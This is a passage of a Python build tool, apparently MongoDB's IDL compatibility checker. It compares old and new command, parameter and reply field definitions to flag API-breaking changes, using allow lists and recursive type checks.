system.bucket.*\n # collections, which users should avoid doing.\n 'listIndexes-reply-originalSpec',\n # The 'vars' field was introduced to facilitate communication between mongot and mongod and is\n # not user visible.\n 'find-reply-vars',\n 'aggregate-reply-vars',\n # The 'cursor' field is now optional in a reply, as inter-node communication in aggregation\n # can return one or more cursors. 
Multiple cursors are covered under the 'cursors' field.\n 'find-reply-cursor',\n 'aggregate-reply-cursor',\n # The 'recordPreImages' field is only used by Realm and is not documented to users.\n 'collMod-param-recordPreImages',\n # The 'ignoreUnknownIndexOptions' field is for internal use only and is not documented to users.\n 'createIndexes-param-ignoreUnknownIndexOptions',\n # The 'runtimeConstants' field is a legacy field for internal use only and is not documented to\n # users.\n 'delete-param-runtimeConstants',\n]\n\nSKIPPED_FILES = [\n \"unittest.idl\", \"mozILocalization.idl\", \"mozILocaleService.idl\", \"mozIOSPreferences.idl\",\n \"nsICollation.idl\", \"nsIStringBundle.idl\", \"nsIScriptableUConv.idl\", \"nsITextToSubURI.idl\"\n]\n\n# Do not add commands that were visible to users in previously released versions.\nIGNORE_COMMANDS_LIST: List[str] = [\n # The following commands were released behind a feature flag in 5.3 but were shelved in\n # favor of getClusterParameter and setClusterParameter. Since the feature flag was not enabled\n # in 5.3, they were effectively unusable and so can be safely removed from the strict API.\n 'getChangeStreamOptions',\n 'setChangeStreamOptions',\n]\n\n\nclass FieldCompatibility:\n \"\"\"Information about a Field to check compatibility.\"\"\"\n\n def __init__(self, field_type: Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]],\n idl_file: syntax.IDLParsedSpec, idl_file_path: str, unstable: Optional[bool],\n optional: bool) -> None:\n \"\"\"Initialize data members and hand special cases, such as optionalBool type.\"\"\"\n self.field_type = field_type\n self.idl_file = idl_file\n self.idl_file_path = idl_file_path\n self.unstable = unstable\n self.optional = optional\n\n if isinstance(self.field_type, syntax.Type) and self.field_type.name == \"optionalBool\":\n # special case for optionalBool type, because it is compatible\n # with bool type, but has bson_serialization_type == 'any'\n # which is not supported by many checks\n self.field_type = syntax.Type(field_type.file_name, field_type.line, field_type.column)\n self.field_type.name = \"bool\"\n self.field_type.bson_serialization_type = [\"bool\"]\n self.optional = True\n\n\n@dataclass\nclass FieldCompatibilityPair:\n \"\"\"Information about an old and new Field pair to check compatibility.\"\"\"\n\n old: FieldCompatibility\n new: FieldCompatibility\n cmd_name: str\n field_name: str\n\n\nclass ArrayTypeCheckResult(Enum):\n \"\"\"Enumeration representing different return values of check_array_type.\"\"\"\n\n INVALID = 0\n TRUE = 1\n FALSE = 2\n\n\ndef get_new_commands(\n ctxt: IDLCompatibilityContext, new_idl_dir: str, import_directories: List[str]\n) -> Tuple[Dict[str, syntax.Command], Dict[str, syntax.IDLParsedSpec], Dict[str, str]]:\n \"\"\"Get new IDL commands and check validity.\"\"\"\n new_commands: Dict[str, syntax.Command] = dict()\n new_command_file: Dict[str, syntax.IDLParsedSpec] = dict()\n new_command_file_path: Dict[str, str] = dict()\n\n for dirpath, _, filenames in os.walk(new_idl_dir):\n for new_filename in filenames:\n if not new_filename.endswith('.idl') or new_filename in SKIPPED_FILES:\n continue\n\n new_idl_file_path = os.path.join(dirpath, new_filename)\n with open(new_idl_file_path) as new_file:\n new_idl_file = parser.parse(\n new_file, new_idl_file_path,\n CompilerImportResolver(import_directories + [new_idl_dir]))\n if new_idl_file.errors:\n new_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {new_idl_file_path}\")\n\n for new_cmd in 
new_idl_file.spec.symbols.commands:\n # Ignore imported commands as they will be processed in their own file.\n if new_cmd.api_version == \"\" or new_cmd.imported:\n continue\n\n if new_cmd.api_version != \"1\":\n # We're not ready to handle future API versions yet.\n ctxt.add_command_invalid_api_version_error(\n new_cmd.command_name, new_cmd.api_version, new_idl_file_path)\n continue\n\n if new_cmd.command_name in new_commands:\n ctxt.add_duplicate_command_name_error(new_cmd.command_name, new_idl_dir,\n new_idl_file_path)\n continue\n new_commands[new_cmd.command_name] = new_cmd\n\n new_command_file[new_cmd.command_name] = new_idl_file\n new_command_file_path[new_cmd.command_name] = new_idl_file_path\n\n return new_commands, new_command_file, new_command_file_path\n\n\ndef get_chained_type_or_struct(\n chained_type_or_struct: Union[syntax.ChainedType, syntax.ChainedStruct],\n idl_file: syntax.IDLParsedSpec,\n idl_file_path: str) -> Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]]:\n \"\"\"Resolve and get chained type or struct from the IDL file.\"\"\"\n parser_ctxt = errors.ParserContext(idl_file_path, errors.ParserErrorCollection())\n resolved = idl_file.spec.symbols.resolve_type_from_name(parser_ctxt, chained_type_or_struct,\n chained_type_or_struct.name,\n chained_type_or_struct.name)\n if parser_ctxt.errors.has_errors():\n parser_ctxt.errors.dump_errors()\n return resolved\n\n\ndef get_field_type(field: Union[syntax.Field, syntax.Command], idl_file: syntax.IDLParsedSpec,\n idl_file_path: str) -> Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]]:\n \"\"\"Resolve and get field type of a field from the IDL file.\"\"\"\n parser_ctxt = errors.ParserContext(idl_file_path, errors.ParserErrorCollection())\n field_type = idl_file.spec.symbols.resolve_field_type(parser_ctxt, field, field.name,\n field.type)\n if parser_ctxt.errors.has_errors():\n parser_ctxt.errors.dump_errors()\n return field_type\n\n\ndef check_subset(ctxt: IDLCompatibilityContext, cmd_name: str, field_name: str, type_name: str,\n sub_list: List[Union[str, syntax.EnumValue]],\n super_list: List[Union[str, syntax.EnumValue]], file_path: str):\n # pylint: disable=too-many-arguments\n \"\"\"Check if sub_list is a subset of the super_list and log an error if not.\"\"\"\n if not set(sub_list).issubset(super_list):\n ctxt.add_reply_field_not_subset_error(cmd_name, field_name, type_name, file_path)\n\n\ndef check_superset(ctxt: IDLCompatibilityContext, cmd_name: str, type_name: str,\n super_list: List[Union[str, syntax.EnumValue]],\n sub_list: List[Union[str, syntax.EnumValue]], file_path: str,\n param_name: Optional[str], is_command_parameter: bool):\n # pylint: disable=too-many-arguments\n \"\"\"Check if super_list is a superset of the sub_list and log an error if not.\"\"\"\n if not set(super_list).issuperset(sub_list):\n ctxt.add_command_or_param_type_not_superset_error(cmd_name, type_name, file_path,\n param_name, is_command_parameter)\n\n\ndef check_reply_field_type_recursive(ctxt: IDLCompatibilityContext,\n field_pair: FieldCompatibilityPair) -> None:\n # pylint: disable=too-many-branches\n \"\"\"Check compatibility between old and new reply field type if old field type is a syntax.Type instance.\"\"\"\n old_field = field_pair.old\n new_field = field_pair.new\n old_field_type = old_field.field_type\n new_field_type = new_field.field_type\n cmd_name = field_pair.cmd_name\n field_name = field_pair.field_name\n\n # If the old field is unstable, we only add errors related to the use of 'any' as the\n # 
bson_serialization_type. For all other errors, we check that the old field is stable\n # before adding an error.\n if not isinstance(new_field_type, syntax.Type):\n if not old_field.unstable:\n ctxt.add_new_reply_field_type_enum_or_struct_error(\n cmd_name, field_name, new_field_type.name, old_field_type.name,\n new_field.idl_file_path)\n return\n\n # If bson_serialization_type switches from 'any' to non-any type.\n if \"any\" in old_field_type.bson_serialization_type and \"any\" not in new_field_type.bson_serialization_type:\n ctxt.add_old_reply_field_bson_any_error(cmd_name, field_name, old_field_type.name,\n new_field_type.name, old_field.idl_file_path)\n return\n\n # If bson_serialization_type switches from non-any to 'any' type.\n if \"any\" not in old_field_type.bson_serialization_type and \"any\" in new_field_type.bson_serialization_type:\n ctxt.add_new_reply_field_bson_any_error(cmd_name, field_name, old_field_type.name,\n new_field_type.name, new_field.idl_file_path)\n return\n\n allow_name: str = cmd_name + \"-reply-\" + field_name\n\n if \"any\" in old_field_type.bson_serialization_type:\n # If 'any' is not explicitly allowed as the bson_serialization_type.\n if allow_name not in ALLOW_ANY_TYPE_LIST:\n ctxt.add_old_reply_field_bson_any_not_allowed_error(\n cmd_name, field_name, old_field_type.name, old_field.idl_file_path)\n return\n\n # If cpp_type is changed, it's a potential breaking change.\n if old_field_type.cpp_type != new_field_type.cpp_type:\n ctxt.add_reply_field_cpp_type_not_equal_error(cmd_name, field_name, new_field_type.name,\n new_field.idl_file_path)\n\n # If serializer is changed, it's a potential breaking change.\n if (not old_field.unstable) and old_field_type.serializer != new_field_type.serializer:\n ctxt.add_reply_field_serializer_not_equal_error(\n cmd_name, field_name, new_field_type.name, new_field.idl_file_path)\n\n # If deserializer is changed, it's a potential breaking change.\n if (not old_field.unstable) and old_field_type.deserializer != new_field_type.deserializer:\n ctxt.add_reply_field_deserializer_not_equal_error(\n cmd_name, field_name, new_field_type.name, new_field.idl_file_path)\n\n if isinstance(old_field_type, syntax.VariantType):\n # If the new type is not variant just check the single type.\n new_variant_types = new_field_type.variant_types if isinstance(\n new_field_type, syntax.VariantType) else [new_field_type]\n old_variant_types = old_field_type.variant_types\n\n # Check that new variant types are a subset of old variant types.\n for new_variant_type in new_variant_types:\n for old_variant_type in old_variant_types:\n if old_variant_type.name == new_variant_type.name:\n # Check that the old and new version of each variant type is also compatible.\n old = FieldCompatibility(old_variant_type, old_field.idl_file,\n old_field.idl_file_path, old_field.unstable,\n old_field.optional)\n new = FieldCompatibility(new_variant_type, new_field.idl_file,\n new_field.idl_file_path, new_field.unstable,\n new_field.optional)\n check_reply_field_type(ctxt,\n FieldCompatibilityPair(old, new, cmd_name, field_name))\n break\n\n else:\n # new_variant_type was not found in old_variant_types.\n if not old_field.unstable:\n ctxt.add_new_reply_field_variant_type_not_subset_error(\n cmd_name, field_name, new_variant_type.name, new_field.idl_file_path)\n\n # If new type is variant and has a struct as a variant type, compare old and new variant_struct_type.\n # Since enums can't be part of variant types, we don't explicitly check for enums.\n if 
isinstance(new_field_type,\n syntax.VariantType) and new_field_type.variant_struct_type is not None:\n if old_field_type.variant_struct_type is None and not old_field.unstable:\n ctxt.add_new_reply_field_variant_type_not_subset_error(\n cmd_name, field_name, new_field_type.variant_struct_type.name,\n new_field.idl_file_path)\n else:\n check_reply_fields(ctxt, old_field_type.variant_struct_type,\n new_field_type.variant_struct_type, cmd_name, old_field.idl_file,\n new_field.idl_file, old_field.idl_file_path,\n new_field.idl_file_path)\n\n elif not old_field.unstable:\n if isinstance(new_field_type, syntax.VariantType):\n ctxt.add_new_reply_field_variant_type_error(cmd_name, field_name, old_field_type.name,\n new_field.idl_file_path)\n else:\n check_subset(ctxt, cmd_name, field_name, new_field_type.name,\n new_field_type.bson_serialization_type,\n old_field_type.bson_serialization_type, new_field.idl_file_path)\n\n\ndef check_reply_field_type(ctxt: IDLCompatibilityContext, field_pair: FieldCompatibilityPair):\n \"\"\"Check compatibility between old and new reply field type.\"\"\"\n # pylint: disable=too-many-branches\n old_field = field_pair.old\n new_field = field_pair.new\n array_check = check_array_type(ctxt, \"reply_field\", old_field.field_type, new_field.field_type,\n field_pair.cmd_name, 'type', old_field.idl_file_path,\n new_field.idl_file_path, old_field.unstable)\n if array_check == ArrayTypeCheckResult.INVALID:\n return\n\n if array_check == ArrayTypeCheckResult.TRUE:\n old_field.field_type = old_field.field_type.element_type\n new_field.field_type = new_field.field_type.element_type\n\n old_field_type = old_field.field_type\n new_field_type = new_field.field_type\n cmd_name = field_pair.cmd_name\n field_name = field_pair.field_name\n if old_field_type is None:\n ctxt.add_reply_field_type_invalid_error(cmd_name, field_name, old_field.idl_file_path)\n ctxt.errors.dump_errors()\n sys.exit(1)\n if new_field_type is None:\n ctxt.add_reply_field_type_invalid_error(cmd_name, field_name, new_field.idl_file_path)\n ctxt.errors.dump_errors()\n sys.exit(1)\n\n if isinstance(old_field_type, syntax.Type):\n check_reply_field_type_recursive(ctxt, field_pair)\n\n elif isinstance(old_field_type, syntax.Enum) and not old_field.unstable:\n if isinstance(new_field_type, syntax.Enum):\n check_subset(ctxt, cmd_name, field_name, new_field_type.name, new_field_type.values,\n old_field_type.values, new_field.idl_file_path)\n else:\n ctxt.add_new_reply_field_type_not_enum_error(cmd_name, field_name, new_field_type.name,\n old_field_type.name,\n new_field.idl_file_path)\n elif isinstance(old_field_type, syntax.Struct):\n if isinstance(new_field_type, syntax.Struct):\n check_reply_fields(ctxt, old_field_type, new_field_type, cmd_name, old_field.idl_file,\n new_field.idl_file, old_field.idl_file_path, new_field.idl_file_path)\n else:\n if not old_field.unstable:\n ctxt.add_new_reply_field_type_not_struct_error(\n cmd_name, field_name, new_field_type.name, old_field_type.name,\n new_field.idl_file_path)\n\n\ndef check_array_type(ctxt: IDLCompatibilityContext, symbol: str,\n old_type: Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]],\n new_type: Optional[Union[syntax.Enum, syntax.Struct, syntax.Type]],\n cmd_name: str, symbol_name: str, old_idl_file_path: str,\n new_idl_file_path: str, old_field_unstable: bool) -> ArrayTypeCheckResult:\n \"\"\"\n Check compatibility between old and new ArrayTypes.\n\n :returns:\n - ArrayTypeCheckResult.TRUE : when the old type and new type are of array type.\n - 
ArrayTypeCheckResult.FALSE : when the old type and new type aren't of array type.\n - ArrayTypeCheckResult.INVALID : when one of the types is not of array type while the other one is.\n \"\"\"\n # pylint: disable=too-many-arguments,too-many-branches\n old_is_array = isinstance(old_type, syntax.ArrayType)\n new_is_array = isinstance(new_type, syntax.ArrayType)\n if not old_is_array and not new_is_array:\n return ArrayTypeCheckResult.FALSE\n\n if (not old_is_array or not new_is_array) and not old_field_unstable:\n ctxt.add_type_not_array_error(symbol, cmd_name, symbol_name, new_type.name, old_type.name,\n new_idl_file_path if old_is_array else old_idl_file_path)\n return ArrayTypeCheckResult.INVALID\n\n return ArrayTypeCheckResult.TRUE\n\n\ndef check_reply_field(ctxt: IDLCompatibilityContext, old_field: syntax.Field,\n new_field: syntax.Field, cmd_name: str, old_idl_file: syntax.IDLParsedSpec,\n new_idl_file: syntax.IDLParsedSpec, old_idl_file_path: str,\n new_idl_file_path: str):\n \"\"\"Check compatibility between old and new reply field.\"\"\"\n # pylint: disable=too-many-arguments\n old_field_type = get_field_type(old_field, old_idl_file, old_idl_file_path)\n new_field_type = get_field_type(new_field, new_idl_file, new_idl_file_path)\n old_field_optional = old_field.optional or (old_field_type\n and old_field_type.name == \"optionalBool\")\n new_field_optional = new_field.optional or (new_field_type\n and new_field_type.name == \"optionalBool\")\n field_name: str = cmd_name + \"-reply-\" + new_field.name\n if not old_field.unstable and field_name not in IGNORE_UNSTABLE_LIST:\n if new_field.unstable and field_name not in IGNORE_UNSTABLE_LIST:\n ctxt.add_new_reply_field_unstable_error(cmd_name, new_field.name, new_idl_file_path)\n if new_field_optional and not old_field_optional:\n ctxt.add_new_reply_field_optional_error(cmd_name, new_field.name, new_idl_file_path)\n\n if new_field.validator:\n if old_field.validator:\n if new_field.validator != old_field.validator:\n ctxt.add_reply_field_validators_not_equal_error(cmd_name, new_field.name,\n new_idl_file_path)\n else:\n ctxt.add_reply_field_contains_validator_error(cmd_name, new_field.name,\n new_idl_file_path)\n\n old_field_compatibility = FieldCompatibility(old_field_type, old_idl_file, old_idl_file_path,\n old_field.unstable, old_field.optional)\n new_field_compatibility = FieldCompatibility(new_field_type, new_idl_file, new_idl_file_path,\n new_field.unstable, new_field.optional)\n field_pair = FieldCompatibilityPair(old_field_compatibility, new_field_compatibility, cmd_name,\n old_field.name)\n\n check_reply_field_type(ctxt, field_pair)\n\n\ndef check_reply_fields(ctxt: IDLCompatibilityContext, old_reply: syntax.Struct,\n new_reply: syntax.Struct, cmd_name: str, old_idl_file: syntax.IDLParsedSpec,\n new_idl_file: syntax.IDLParsedSpec, old_idl_file_path: str,\n new_idl_file_path: str):\n \"\"\"Check compatibility between old and new reply fields.\"\"\"\n # pylint: disable=too-many-arguments,too-many-branches\n for new_chained_type in new_reply.chained_types or []:\n resolved_new_chained_type = get_chained_type_or_struct(new_chained_type, new_idl_file,\n new_idl_file_path)\n if resolved_new_chained_type is not None:\n for old_chained_type in old_reply.chained_types or []:\n resolved_old_chained_type = get_chained_type_or_struct(\n old_chained_type, old_idl_file, old_idl_file_path)\n if (resolved_old_chained_type is not None\n and resolved_old_chained_type.name == resolved_new_chained_type.name):\n # Check that the old and new version 
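# Illustrative sketch (made-up type lists, not taken from any IDL file): the rule encoded by
# check_subset()/check_superset() above is plain set containment. A reply field may only narrow
# its bson_serialization_type (the new list must be a subset of the old one), while a command
# parameter may only widen it (the new list must be a superset of the old one).
old_reply_types = ["int", "long"]
new_reply_types = ["int"]
assert set(new_reply_types).issubset(old_reply_types)      # reply narrowed: compatible

old_param_types = ["string"]
new_param_types = ["string", "symbol"]
assert set(new_param_types).issuperset(old_param_types)    # parameter widened: compatible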
of each chained type is also compatible.\n old = FieldCompatibility(resolved_old_chained_type, old_idl_file,\n old_idl_file_path, unstable=False, optional=False)\n new = FieldCompatibility(resolved_new_chained_type, new_idl_file,\n new_idl_file_path, unstable=False, optional=False)\n\n check_reply_field_type(\n ctxt, FieldCompatibilityPair(old, new, cmd_name, old_reply.name))\n break\n\n else:\n # new chained type was not found in old chained types.\n ctxt.add_new_reply_chained_type_not_subset_error(\n cmd_name, new_reply.name, resolved_new_chained_type.name, new_idl_file_path)\n\n old_reply_fields = get_all_struct_fields(old_reply, old_idl_file, old_idl_file_path)\n new_reply_fields = get_all_struct_fields(new_reply, new_idl_file, new_idl_file_path)\n for old_field in old_reply_fields or []:\n new_field_exists = False\n for new_field in new_reply_fields or []:\n if new_field.name == old_field.name:\n new_field_exists = True\n check_reply_field(ctxt, old_field, new_field, cmd_name, old_idl_file, new_idl_file,\n old_idl_file_path, new_idl_file_path)\n\n break\n\n if not new_field_exists and not old_field.unstable:\n ctxt.add_new_reply_field_missing_error(cmd_name, old_field.name, old_idl_file_path)\n\n for new_field in new_reply_fields or []:\n # Check that all fields in the new IDL have specified the 'unstable' field.\n if new_field.unstable is None:\n ctxt.add_new_reply_field_requires_unstable_error(cmd_name, new_field.name,\n new_idl_file_path)\n\n # Check that newly added fields do not have an unallowed use of 'any' as the\n # bson_serialization_type.\n newly_added = True\n for old_field in old_reply_fields or []:\n if new_field.name == old_field.name:\n newly_added = False\n\n if newly_added:\n allow_name: str = cmd_name + \"-reply-\" + new_field.name\n\n new_field_type = get_field_type(new_field, new_idl_file, new_idl_file_path)\n # If we encounter a bson_serialization_type of None, we skip checking if 'any' is used.\n if isinstance(\n new_field_type, syntax.Type\n ) and new_field_type.bson_serialization_type is not None and \"any\" in new_field_type.bson_serialization_type:\n # If 'any' is not explicitly allowed as the bson_serialization_type.\n any_allow = allow_name in ALLOW_ANY_TYPE_LIST or new_field_type.name == 'optionalBool'\n if not any_allow:\n ctxt.add_new_reply_field_bson_any_not_allowed_error(\n cmd_name, new_field.name, new_field_type.name, new_idl_file_path)\n\n\ndef check_param_or_command_type_recursive(ctxt: IDLCompatibilityContext,\n field_pair: FieldCompatibilityPair,\n is_command_parameter: bool):\n # pylint: disable=too-many-branches,too-many-locals\n \"\"\"\n Check compatibility between old and new command or param type recursively.\n\n If the old type is a syntax.Type instance, check the compatibility between the old and new\n command type or parameter type recursively.\n \"\"\"\n old_field = field_pair.old\n new_field = field_pair.new\n old_type = old_field.field_type\n new_type = new_field.field_type\n cmd_name = field_pair.cmd_name\n param_name = field_pair.field_name\n\n # If the old field is unstable, we only add errors related to the use of 'any' as the\n # bson_serialization_type. 
For all other errors, we check that the old field is stable\n # before adding an error.\n\n if not isinstance(new_type, syntax.Type):\n if not old_field.unstable:\n ctxt.add_new_command_or_param_type_enum_or_struct_error(\n cmd_name, new_type.name, old_type.name, new_field.idl_file_path, param_name,\n is_command_parameter)\n return\n\n allow_name: str = cmd_name + \"-param-\" + param_name if is_command_parameter else cmd_name\n\n # If bson_serialization_type switches from 'any' to non-any type.\n if \"any\" in old_type.bson_serialization_type and \"any\" not in new_type.bson_serialization_type:\n ctxt.add_old_command_or_param_type_bson_any_error(cmd_name, old_type.name, new_type.name,\n old_field.idl_file_path, param_name,\n is_command_parameter)\n return\n\n # If bson_serialization_type switches from non-any to 'any' type.\n if \"any\" not in old_type.bson_serialization_type and \"any\" in new_type.bson_serialization_type:\n ctxt.add_new_command_or_param_type_bson_any_error(cmd_name, old_type.name, new_type.name,\n new_field.idl_file_path, param_name,\n is_command_parameter)\n return\n\n if \"any\" in old_type.bson_serialization_type:\n # If 'any' is not explicitly allowed as the bson_serialization_type.\n if allow_name not in ALLOW_ANY_TYPE_LIST:\n ctxt.add_old_command_or_param_type_bson_any_not_allowed_error(\n cmd_name, old_type.name, old_field.idl_file_path, param_name, is_command_parameter)\n return\n\n # If cpp_type is changed, it's a potential breaking change.\n if old_type.cpp_type != new_type.cpp_type:\n ctxt.add_command_or_param_cpp_type_not_equal_error(\n cmd_name, new_type.name, new_field.idl_file_path, param_name, is_command_parameter)\n\n # If serializer is changed, it's a potential breaking change.\n if (not old_field.unstable) and old_type.serializer != new_type.serializer:\n ctxt.add_command_or_param_serializer_not_equal_error(\n cmd_name, new_type.name, new_field.idl_file_path, param_name, is_command_parameter)\n\n # If deserializer is changed, it's a potential breaking change.\n if (not old_field.unstable) and old_type.deserializer != new_type.deserializer:\n ctxt.add_command_or_param_deserializer_not_equal_error(\n cmd_name, new_type.name, new_field.idl_file_path, param_name, is_command_parameter)\n\n if isinstance(old_type, syntax.VariantType):\n if not isinstance(new_type, syntax.VariantType):\n if not old_field.unstable:\n ctxt.add_new_command_or_param_type_not_variant_type_error(\n cmd_name, new_type.name, new_field.idl_file_path, param_name,\n is_command_parameter)\n else:\n new_variant_types = new_type.variant_types\n old_variant_types = old_type.variant_types\n\n # Check that new variant types are a superset of old variant types.\n for old_variant_type in old_variant_types:\n for new_variant_type in new_variant_types:\n # object->object_owned serialize to the same bson type. 
object_owned->object is\n # not always safe so we only limit this special case to object->object_owned.\n if (old_variant_type.name == \"object\" and new_variant_type.name == \"object_owned\") or \\\n old_variant_type.name == new_variant_type.name:\n # Check that the old and new version of each variant type is also compatible.\n old = FieldCompatibility(old_variant_type, old_field.idl_file,\n old_field.idl_file_path, old_field.unstable,\n old_field.optional)\n new = FieldCompatibility(new_variant_type, new_field.idl_file,\n new_field.idl_file_path, new_field.unstable,\n new_field.optional)\n check_param_or_command_type(\n ctxt, FieldCompatibilityPair(old, new, cmd_name, param_name),\n is_command_parameter)\n break\n else:\n if not old_field.unstable:\n # old_variant_type was not found in new_variant_types.\n ctxt.add_new_command_or_param_variant_type_not_superset_error(\n cmd_name, old_variant_type.name, new_field.idl_file_path, param_name,\n is_command_parameter)\n\n # If old and new types both have a struct as a variant type, compare old and new variant_struct_type.\n # Since enums can't be part of variant types, we don't explicitly check for enums.\n if old_type.variant_struct_type is not None:\n if new_type.variant_struct_type is not None:\n check_command_params_or_type_struct_fields(\n ctxt, old_type.variant_struct_type, new_type.variant_struct_type, cmd_name,\n old_field.idl_file, new_field.idl_file, old_field.idl_file_path,\n new_field.idl_file_path, is_command_parameter)\n\n # If old type has a variant struct type and new type does not have a variant struct type.\n elif not old_field.unstable:\n ctxt.add_new_command_or_param_variant_type_not_superset_error(\n cmd_name, old_type.variant_struct_type.name, new_field.idl_file_path,\n param_name, is_command_parameter)\n\n elif not old_field.unstable:\n check_superset(ctxt, cmd_name, new_type.name, new_type.bson_serialization_type,\n old_type.bson_serialization_type, new_field.idl_file_path, param_name,\n is_command_parameter)\n\n\ndef check_param_or_command_type(ctxt: IDLCompatibilityContext, field_pair: FieldCompatibilityPair,\n is_command_parameter: bool):\n \"\"\"Check compatibility between old and new command parameter type or command type.\"\"\"\n # pylint: disable=too-many-branches\n old_field = field_pair.old\n new_field = field_pair.new\n array_check = check_array_type(\n ctxt, \"command_parameter\" if is_command_parameter else \"command_namespace\",\n old_field.field_type, new_field.field_type, field_pair.cmd_name,\n field_pair.field_name if is_command_parameter else \"type\", old_field.idl_file_path,\n new_field.idl_file_path, old_field.unstable)\n if array_check == ArrayTypeCheckResult.INVALID:\n return\n\n if array_check == ArrayTypeCheckResult.TRUE:\n old_field.field_type = old_field.field_type.element_type\n new_field.field_type = new_field.field_type.element_type\n\n old_type = old_field.field_type\n new_type = new_field.field_type\n if old_type is None:\n ctxt.add_command_or_param_type_invalid_error(field_pair.cmd_name, old_field.idl_file_path,\n field_pair.field_name, is_command_parameter)\n ctxt.errors.dump_errors()\n sys.exit(1)\n if new_type is None:\n ctxt.add_command_or_param_type_invalid_error(field_pair.cmd_name, new_field.idl_file_path,\n field_pair.field_name, is_command_parameter)\n ctxt.errors.dump_errors()\n sys.exit(1)\n\n if isinstance(old_type, syntax.Type):\n check_param_or_command_type_recursive(ctxt, field_pair, is_command_parameter)\n\n # Only add type errors if the old field is stable.\n elif 
isinstance(old_type, syntax.Enum) and not old_field.unstable:\n if isinstance(new_type, syntax.Enum):\n check_superset(ctxt, field_pair.cmd_name, new_type.name, new_type.values,\n old_type.values, new_field.idl_file_path, field_pair.field_name,\n is_command_parameter)\n else:\n ctxt.add_new_command_or_param_type_not_enum_error(\n field_pair.cmd_name, new_type.name, old_type.name, new_field.idl_file_path,\n field_pair.field_name, is_command_parameter)\n\n elif isinstance(old_type, syntax.Struct):\n if isinstance(new_type, syntax.Struct):\n check_command_params_or_type_struct_fields(\n ctxt, old_type, new_type, field_pair.cmd_name, old_field.idl_file,\n new_field.idl_file, old_field.idl_file_path, new_field.idl_file_path,\n is_command_parameter)\n else:\n if not old_field.unstable:\n ctxt.add_new_command_or_param_type_not_struct_error(\n field_pair.cmd_name, new_type.name, old_type.name, new_field.idl_file_path,\n field_pair.field_name, is_command_parameter)\n\n\ndef check_param_or_type_validator(ctxt: IDLCompatibilityContext, old_field: syntax.Field,\n new_field: syntax.Field, cmd_name: str, new_idl_file_path: str,\n type_name: Optional[str], is_command_parameter: bool):\n \"\"\"\n Check compatibility between old and new validators.\n\n Check compatibility between old and new validators in command parameter type and command type\n struct fields.\n \"\"\"\n # pylint: disable=too-many-arguments\n if new_field.validator:\n if old_field.validator:\n if new_field.validator != old_field.validator:\n ctxt.add_command_or_param_type_validators_not_equal_error(\n cmd_name, new_field.name, new_idl_file_path, type_name, is_command_parameter)\n else:\n ctxt.add_command_or_param_type_contains_validator_error(\n cmd_name, new_field.name, new_idl_file_path, type_name, is_command_parameter)\n\n\ndef get_all_struct_fields(struct: syntax.Struct, idl_file: syntax.IDLParsedSpec,\n idl_file_path: str):\n \"\"\"Get all the fields of a struct, including the chained struct fields.\"\"\"\n all_fields = struct.fields or []\n for chained_struct in struct.chained_structs or []:\n resolved_chained_struct = get_chained_type_or_struct(chained_struct, idl_file,\n idl_file_path)\n if resolved_chained_struct is not None:\n for field in resolved_chained_struct.fields:\n all_fields.append(field)\n\n return all_fields\n\n\ndef check_command_params_or_type_struct_fields(\n ctxt: IDLCompatibilityContext, old_struct: syntax.Struct, new_struct: syntax.Struct,\n cmd_name: str, old_idl_file: syntax.IDLParsedSpec, new_idl_file: syntax.IDLParsedSpec,\n old_idl_file_path: str, new_idl_file_path: str, is_command_parameter: bool):\n \"\"\"Check compatibility between old and new parameters or command type fields.\"\"\"\n # pylint: disable=too-many-arguments,too-many-branches\n # Check chained types.\n for old_chained_type in old_struct.chained_types or []:\n resolved_old_chained_type = get_chained_type_or_struct(old_chained_type, old_idl_file,\n old_idl_file_path)\n if resolved_old_chained_type is not None:\n for new_chained_type in new_struct.chained_types or []:\n resolved_new_chained_type = get_chained_type_or_struct(\n new_chained_type, new_idl_file, new_idl_file_path)\n if (resolved_new_chained_type is not None\n and resolved_old_chained_type.name == resolved_new_chained_type.name):\n # Check that the old and new version of each chained type is also compatible.\n old = FieldCompatibility(resolved_old_chained_type, old_idl_file,\n old_idl_file_path, unstable=False, optional=False)\n new = FieldCompatibility(resolved_new_chained_type, 
new_idl_file,\n new_idl_file_path, unstable=False, optional=False)\n check_param_or_command_type(\n ctxt, FieldCompatibilityPair(old, new, cmd_name, old_struct.name),\n is_command_parameter=False)\n break\n\n else:\n # old chained type was not found in new chained types.\n ctxt.add_new_command_or_param_chained_type_not_superset_error(\n cmd_name, old_chained_type.name, new_idl_file_path, old_struct.name,\n is_command_parameter)\n\n old_struct_fields = get_all_struct_fields(old_struct, old_idl_file, old_idl_file_path)\n new_struct_fields = get_all_struct_fields(new_struct, new_idl_file, new_idl_file_path)\n\n # We need to special-case the stmtId parameter because it was removed. However, it's not a\n # breaking change to the API because it was added and removed behind a feature flag, so it was\n # never officially released.\n allow_list = [\"endSessions-param-stmtId\", \"refreshSessions-param-stmtId\"]\n\n for old_field in old_struct_fields or []:\n new_field_exists = False\n for new_field in new_struct_fields or []:\n if new_field.name == old_field.name:\n new_field_exists = True\n check_command_param_or_type_struct_field(\n ctxt, old_field, new_field, cmd_name, old_idl_file, new_idl_file,\n old_idl_file_path, new_idl_file_path, old_struct.name, is_command_parameter)\n\n break\n allow_name: str = cmd_name + \"-param-\" + old_field.name\n if not new_field_exists and not old_field.unstable and allow_name not in allow_list:\n ctxt.add_new_param_or_command_type_field_missing_error(\n cmd_name, old_field.name, old_idl_file_path, old_struct.name, is_command_parameter)\n\n # Check if a new field has been added to the parameters or type struct.\n # If so, it must be optional.\n for new_field in new_struct_fields or []:\n # Check that all fields in the new IDL have specified the 'unstable' field.\n if new_field.unstable is None:\n ctxt.add_new_param_or_command_type_field_requires_unstable_error(\n cmd_name, new_field.name, new_idl_file_path, is_command_parameter)\n\n newly_added = True\n for old_field in old_struct_fields or []:\n if new_field.name == old_field.name:\n newly_added = False\n\n if newly_added:\n new_field_type = get_field_type(new_field, new_idl_file, new_idl_file_path)\n new_field_optional = new_field.optional or (new_field_type\n and new_field_type.name == 'optionalBool')\n if not new_field_optional and not new_field.unstable:\n ctxt.add_new_param_or_command_type_field_added_required_error(\n cmd_name, new_field.name, new_idl_file_path, new_struct.name,\n is_command_parameter)\n\n # Check that a new field does not have an unallowed use of 'any' as the bson_serialization_type.\n any_allow_name: str = (cmd_name + \"-param-\" + new_field.name\n if 